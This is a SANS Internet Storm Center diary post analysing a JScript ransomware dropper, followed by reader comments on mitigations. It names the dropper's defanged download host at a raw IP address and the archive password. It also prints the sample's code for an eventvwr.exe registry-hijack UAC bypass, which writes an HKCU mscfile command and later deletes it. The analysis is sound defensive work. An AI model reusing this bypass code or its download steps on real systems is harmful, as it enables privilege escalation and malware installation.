Threat Level: green Handler on Duty: Rick Wanner

SANS ISC: UAC Bypass in JScript Dropper - SANS Internet Storm Center SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
UAC Bypass in JScript Dropper

Yesterday, one of our readers sent us a malicious piece of JScript: doc2016044457899656.pdf.js.js. It's always interesting to have a look at samples coming from alternate sources because they may slightly differ from what we usually receive on a daily basis. Only yesterday, my spam trap collected 488 ransomware samples from the different campaigns but always based on the same techniques.

The JScript code was, of course, obfuscated but it was easily read by a human. Usually, there is no need to implement complex obfuscation to bypass AV detection. This sample had a score of 8/54 on VT. What was different? First of all, it just tries to download two files from a remote server:

  • hxxp://45.58.49.54/7za.exe
  • hxxp://45.58.49.54/process.zip

The bad guy was lazy (or smart?) and did not implement complex encryption functions in his code. 7za.exe[1] is a clean file (42badc1d2f03a8b1e4875740d3d49336) used to extract two malicious PE files from the process.zip archive. This archive is protected by a password that is stored and obfuscated in the code. The obfuscation technique is simple: just based on strings of hexadecimal characters:

var AACRSODLXACCGDOLOSOX = LXCTAOHOHSYOAASHNDCA("6D696E617331303030");

This can be easily decoded with Python:

>>> '6D696E617331303030'.decode('hex')
'minas1000'

The destination path is generated via multiple variables and is finally set to "C:\Users\[user]\AppData\Local\", "user" being the victim's login. The archive is unzipped in this directory:

C:\Users\[user]\AppData\Local\7za.exe x C:\Users\[user]\AppData\Local\COCNOACTXATASGNOTOAS -pminas1000 -o C:\Users\[user]\AppData\Local\

Two new PE files are stored on the file system then executed:

  • processexplorerpe.exe (55c0548290a5dc43bc54a6a15ccd42fd) [2]
  • peprocesss.exe (6b96e8a9c13966086b1e2dd65ac84656) [3]

What makes this sample different? After the classic execution of the PE files, it tries to bypass the Windows UAC using a "feature" present in eventvwr.exe. This system tool runs as a high integrity process and uses HKCU / HKCR registry hives to start mmc.exe which opens finally eventvwr.msc. More information about this behaviour is available on the Microsoft website[4].

The trick is to create the registry entry that is checked by eventvwr.exe and to store the malicious binary ("ODASTATACOTSTAODHOOD" is the path to the malicious peprocess.exe):

var WshShell = WScript.CreateObject ("WScript.Shell");
WshShell.RegWrite ("HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\\", ODASTATACOTSTAODHOOD, "REG_SZ");

Once done, eventvwr.exe is started. It will read the registry and execute our sample which will run with high privileges:

var ZLGOZYLOLHONHTXTAOOR = environmentVars("WINDIR") + "\\SYSTEM32\\"+"eventvwr.exe";
AAOGAODYSCSTSOAOLHAC = new ActiveXObject("Wscript.Shell");
AAOGAODYSCSTSOAOLHAC.Run(ZLGOZYLOLHONHTXTAOOR, 1, 1);

Let's wait for the malware to accomplish its bad stuff and remove the registry entry:

WScript.Sleep(60000);
var wshShell = new ActiveXObject("WScript.Shell");
wshShell.Run("REG DELETE HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /ve /f");

More information about this technique to bypass UAC is available on github.com[5] with a PoC script in Powershell.

If you receive interesting samples, feel free to share them! We always need fresh meat!

[1] http://www.7-zip.org/download.html
[2] https://www.virustotal.com/en/file/305fe0e8e8753dd2bf79fd349760b5c83d75097becc98a541b489bd5456b7b5e/analysis/
[3] https://www.virustotal.com/en/file/7b1f0831ea6943fb1f2a2714f71b16c890baf15c985833e0a590fe6545c7e16f/analysis/
[4] https://msdn.microsoft.com/en-us/library/bb742441.aspx
[5] https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

Xme

314 Posts
ISC Handler
you *do* realize those exe links get rendered by rss readers and stuff don't you? please defang!
Anonymous

Posts
You're right, thank for the notification (mistake from my part)
Hopefully, they're not available (403 returned)
Xme

314 Posts Posts
ISC Handler
There are o-so-many ways to neuter these threats:

1. use Software Restriction Policies (either SRPv1 alias SAFER, or SRPv2 alias AppLocker) and allow execution only in %SystemRoot% and below as well as %ProgramFiles% and below

2. add the NTFS ACE "(D;OIIO;WP;;;WD)" to %USERPROFILE%, %ALLUSERSPROFILE% and %ProgramData%, meaning "deny execution of files in this directory and its subdirectories"

3. create the registry entry/entries
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers]
"C:\\Windows\\System32\\EventVwr.Exe"="RunAsInvoker"
"C:\\Windows\\SysWoW64\\EventVwr.Exe"="RunAsInvoker"
"C:\\Windows\\Sysnative\\EventVwr.Exe"="RunAsInvoker"

...
Anonymous

Posts
SRP? Let me warn you all: SANDBOX_INERT!

https://msdn.microsoft.com/en-us/library/windows/desktop/aa446583%28v=vs.85%29.aspx
Anonymous

Posts
Quoting Anonymous:SRP? Let me warn you all: SANDBOX_INERT!

https://msdn.microsoft.com/en-us/library/windows/desktop/aa446583%28v=vs.85%29.aspx


OUCH!
1. everybody NOT living under a rock for more than five years knows KB2532445!
2. before malware can call a Win32 API function with SANDBOX_INERT it must pass past SRP!
Anonymous

Posts

Sign Up for Free or Log In to start participating in the conversation!